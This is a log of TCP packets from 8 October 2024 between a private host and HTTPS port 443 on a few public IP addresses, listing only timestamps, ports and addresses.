Oct 8, 2024 20:47:52.304714918 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:52.304733992 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.304822922 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:52.304856062 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:52.306952000 CEST	49954	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.306998968 CEST	443	49954	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.307085991 CEST	49954	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.307306051 CEST	49954	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.307332039 CEST	443	49954	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.313400984 CEST	443	49950	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.314913034 CEST	443	49950	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.314969063 CEST	443	49950	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.314971924 CEST	49950	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.315038919 CEST	49950	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.315092087 CEST	49950	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.315109968 CEST	443	49950	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.315134048 CEST	49950	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.315145969 CEST	443	49950	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.317476988 CEST	49955	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.317522049 CEST	443	49955	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.317614079 CEST	49955	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.317768097 CEST	49955	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.317794085 CEST	443	49955	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.324878931 CEST	443	49951	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.325001001 CEST	443	49951	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.325110912 CEST	49951	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.325145960 CEST	49951	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.325169086 CEST	443	49951	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.325191021 CEST	49951	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.325202942 CEST	443	49951	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.327450037 CEST	49956	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.327483892 CEST	443	49956	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.327558994 CEST	49956	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.327708006 CEST	49956	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.327724934 CEST	443	49956	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.407290936 CEST	443	49952	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.407824993 CEST	49952	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.407855988 CEST	443	49952	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.408235073 CEST	49952	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.408246040 CEST	443	49952	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.410123110 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.410142899 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.410233974 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:52.410259008 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.410437107 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:52.414351940 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.414422035 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:52.414434910 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.414452076 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.414520025 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:52.414673090 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:52.414693117 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.414716005 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:52.414726973 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.430897951 CEST	443	49953	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.431325912 CEST	49953	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.431379080 CEST	443	49953	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.431679010 CEST	49953	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.431694031 CEST	443	49953	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.432115078 CEST	49957	443	192.168.2.5	172.67.206.204
Oct 8, 2024 20:47:52.432156086 CEST	443	49957	172.67.206.204	192.168.2.5
Oct 8, 2024 20:47:52.432250023 CEST	49957	443	192.168.2.5	172.67.206.204
Oct 8, 2024 20:47:52.432647943 CEST	49957	443	192.168.2.5	172.67.206.204
Oct 8, 2024 20:47:52.432674885 CEST	443	49957	172.67.206.204	192.168.2.5
Oct 8, 2024 20:47:52.516699076 CEST	443	49952	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.517153978 CEST	443	49952	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.517236948 CEST	49952	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.517468929 CEST	49952	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.517492056 CEST	443	49952	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.517514944 CEST	49952	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.517528057 CEST	443	49952	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.519984007 CEST	49958	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.520009041 CEST	443	49958	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.520101070 CEST	49958	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.520215988 CEST	49958	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.520227909 CEST	443	49958	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.543973923 CEST	443	49953	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.544193029 CEST	443	49953	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.544301987 CEST	49953	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.544440031 CEST	49953	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.544440031 CEST	49953	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.544476986 CEST	443	49953	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.544502020 CEST	443	49953	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.546315908 CEST	49959	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.546345949 CEST	443	49959	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.546426058 CEST	49959	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.546525955 CEST	49959	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.546541929 CEST	443	49959	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.904691935 CEST	443	49957	172.67.206.204	192.168.2.5
Oct 8, 2024 20:47:52.904789925 CEST	49957	443	192.168.2.5	172.67.206.204
Oct 8, 2024 20:47:52.906893015 CEST	49957	443	192.168.2.5	172.67.206.204
Oct 8, 2024 20:47:52.906917095 CEST	443	49957	172.67.206.204	192.168.2.5
Oct 8, 2024 20:47:52.907145023 CEST	443	49957	172.67.206.204	192.168.2.5
Oct 8, 2024 20:47:52.908328056 CEST	49957	443	192.168.2.5	172.67.206.204
Oct 8, 2024 20:47:52.908369064 CEST	49957	443	192.168.2.5	172.67.206.204
Oct 8, 2024 20:47:52.908413887 CEST	443	49957	172.67.206.204	192.168.2.5
Oct 8, 2024 20:47:52.988013983 CEST	443	49954	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.988560915 CEST	49954	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.988599062 CEST	443	49954	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.988977909 CEST	443	49956	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.989015102 CEST	49954	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.989027977 CEST	443	49954	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.989242077 CEST	49956	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.989270926 CEST	443	49956	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.989541054 CEST	49956	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.989547014 CEST	443	49956	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.005815029 CEST	443	49955	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.006362915 CEST	49955	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.006395102 CEST	443	49955	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.006803989 CEST	49955	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.006814957 CEST	443	49955	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.098134995 CEST	443	49956	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.098164082 CEST	443	49956	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.098220110 CEST	443	49956	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.098231077 CEST	49956	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.098292112 CEST	49956	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.098499060 CEST	49956	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.098515034 CEST	443	49956	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.098526955 CEST	49956	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.098534107 CEST	443	49956	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.101190090 CEST	443	49954	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.101212025 CEST	443	49954	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.101247072 CEST	443	49954	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.101300001 CEST	49954	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.101344109 CEST	49954	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.101555109 CEST	49954	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.101574898 CEST	443	49954	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.101588011 CEST	49954	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.101594925 CEST	443	49954	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.101689100 CEST	49960	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.101723909 CEST	443	49960	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.101808071 CEST	49960	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.101918936 CEST	49960	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.101929903 CEST	443	49960	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.104154110 CEST	49961	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.104228973 CEST	443	49961	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.104322910 CEST	49961	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.104537964 CEST	49961	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.104571104 CEST	443	49961	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.114629030 CEST	443	49955	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.114747047 CEST	443	49955	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.114890099 CEST	49955	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.114937067 CEST	49955	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.114937067 CEST	49955	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.114969969 CEST	443	49955	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.114990950 CEST	443	49955	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.117130995 CEST	49962	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.117166996 CEST	443	49962	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.117268085 CEST	49962	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.117436886 CEST	49962	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.117464066 CEST	443	49962	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.170470953 CEST	443	49958	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.171083927 CEST	49958	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.171097040 CEST	443	49958	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.171490908 CEST	49958	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.171499014 CEST	443	49958	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.201738119 CEST	443	49959	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.202198982 CEST	49959	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.202219009 CEST	443	49959	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.202610016 CEST	49959	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.202615976 CEST	443	49959	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.677920103 CEST	443	49958	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.677993059 CEST	443	49958	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.678050041 CEST	49958	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.678262949 CEST	49958	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.678289890 CEST	443	49958	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.678303957 CEST	49958	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.678311110 CEST	443	49958	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.678370953 CEST	443	49959	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.678447008 CEST	443	49959	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.678498983 CEST	49959	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.678518057 CEST	443	49959	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.678570986 CEST	443	49959	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.678621054 CEST	49959	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.679661989 CEST	49959	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.679678917 CEST	443	49959	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.679688931 CEST	49959	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.679697037 CEST	443	49959	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.679776907 CEST	443	49957	172.67.206.204	192.168.2.5
Oct 8, 2024 20:47:53.679853916 CEST	443	49957	172.67.206.204	192.168.2.5
Oct 8, 2024 20:47:53.679908991 CEST	49957	443	192.168.2.5	172.67.206.204
Oct 8, 2024 20:47:53.681139946 CEST	49957	443	192.168.2.5	172.67.206.204
Oct 8, 2024 20:47:53.681186914 CEST	443	49957	172.67.206.204	192.168.2.5
Oct 8, 2024 20:47:53.681233883 CEST	49957	443	192.168.2.5	172.67.206.204
Oct 8, 2024 20:47:53.681250095 CEST	443	49957	172.67.206.204	192.168.2.5
Oct 8, 2024 20:47:53.683728933 CEST	49963	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.683768988 CEST	443	49963	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.683832884 CEST	49963	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.684709072 CEST	49964	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.684798956 CEST	443	49964	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.684878111 CEST	49964	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.684977055 CEST	49963	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.684990883 CEST	443	49963	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.685076952 CEST	49964	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.685110092 CEST	443	49964	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.873153925 CEST	443	49962	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.873743057 CEST	49962	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.873759985 CEST	443	49962	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.874330997 CEST	49962	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.874341965 CEST	443	49962	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.883470058 CEST	443	49961	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.883873940 CEST	49961	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.883888960 CEST	443	49961	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.884526014 CEST	49961	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.884535074 CEST	443	49961	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.975081921 CEST	443	49962	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.975137949 CEST	443	49962	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.975265980 CEST	49962	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.975429058 CEST	49962	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.975430012 CEST	49962	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.975476027 CEST	443	49962	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.975505114 CEST	443	49962	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.978240013 CEST	49965	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.978329897 CEST	443	49965	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.978439093 CEST	49965	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.978574038 CEST	49965	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.978609085 CEST	443	49965	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.985621929 CEST	443	49961	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.985709906 CEST	443	49961	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.985784054 CEST	49961	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.986320972 CEST	49961	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.986349106 CEST	443	49961	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.986401081 CEST	49961	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.986417055 CEST	443	49961	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.996632099 CEST	49966	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.996665001 CEST	443	49966	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:53.996794939 CEST	49966	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.996937990 CEST	49966	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:53.996963978 CEST	443	49966	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.620676041 CEST	443	49965	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.621141911 CEST	443	49963	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.621840954 CEST	49963	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.621875048 CEST	443	49963	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.621956110 CEST	49965	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.622015953 CEST	443	49965	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.622246027 CEST	49963	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.622255087 CEST	443	49963	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.622256041 CEST	49965	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.622271061 CEST	443	49965	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.633140087 CEST	443	49964	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.635608912 CEST	49964	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.635649920 CEST	443	49964	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.635863066 CEST	49964	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.635869026 CEST	443	49964	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.687133074 CEST	443	49966	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.689958096 CEST	49966	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.690021038 CEST	443	49966	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.690283060 CEST	49966	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.690299988 CEST	443	49966	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.720832109 CEST	443	49965	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.720887899 CEST	443	49965	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.720978975 CEST	49965	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.721297979 CEST	49965	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.721344948 CEST	443	49965	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.721376896 CEST	49965	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.721393108 CEST	443	49965	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.721652031 CEST	443	49963	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.721673012 CEST	443	49963	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.721713066 CEST	443	49963	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.721721888 CEST	49963	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.721762896 CEST	49963	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.722469091 CEST	49963	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.722496033 CEST	443	49963	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.722511053 CEST	49963	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.722518921 CEST	443	49963	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.725018024 CEST	49967	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.725069046 CEST	443	49967	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.725140095 CEST	49967	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.725404978 CEST	49968	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.725439072 CEST	443	49968	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.725492001 CEST	49968	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.725512028 CEST	49967	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.725531101 CEST	443	49967	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.725589037 CEST	49968	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.725605965 CEST	443	49968	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.748414993 CEST	443	49964	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.748784065 CEST	443	49964	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.749327898 CEST	49964	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.749327898 CEST	49964	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.749407053 CEST	49964	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.749447107 CEST	443	49964	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.751110077 CEST	49969	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.751133919 CEST	443	49969	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.751198053 CEST	49969	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.751302004 CEST	49969	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.751315117 CEST	443	49969	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.795970917 CEST	443	49966	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.798991919 CEST	443	49966	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.800405025 CEST	49966	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.800483942 CEST	49966	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.800483942 CEST	49966	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.800525904 CEST	443	49966	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.800551891 CEST	443	49966	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.802113056 CEST	49970	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.802140951 CEST	443	49970	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:54.802198887 CEST	49970	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.802280903 CEST	49970	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:54.802285910 CEST	443	49970	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.366063118 CEST	443	49967	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.366584063 CEST	49967	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.366643906 CEST	443	49967	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.367285013 CEST	49967	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.367297888 CEST	443	49967	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.397912025 CEST	443	49969	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.398612022 CEST	49969	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.398637056 CEST	443	49969	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.398926020 CEST	49969	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.398931980 CEST	443	49969	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.400223970 CEST	443	49968	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.400471926 CEST	49968	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.400504112 CEST	443	49968	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.400738955 CEST	49968	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.400748014 CEST	443	49968	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.451432943 CEST	443	49970	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.452251911 CEST	49970	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.452279091 CEST	443	49970	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.452677011 CEST	49970	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.452687979 CEST	443	49970	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.495295048 CEST	443	49967	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.495887995 CEST	443	49967	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.496026039 CEST	49967	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.496105909 CEST	49967	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.496105909 CEST	49967	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.496150017 CEST	443	49967	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.496179104 CEST	443	49967	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.498353004 CEST	443	49969	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.498826981 CEST	49971	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.498857021 CEST	443	49971	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.498907089 CEST	443	49969	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:55.498934031 CEST	49971	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.498966932 CEST	49969	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.499001026 CEST	49969	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:55.499018908 CEST	443	49969	13.107.246.60	192.168.2.5
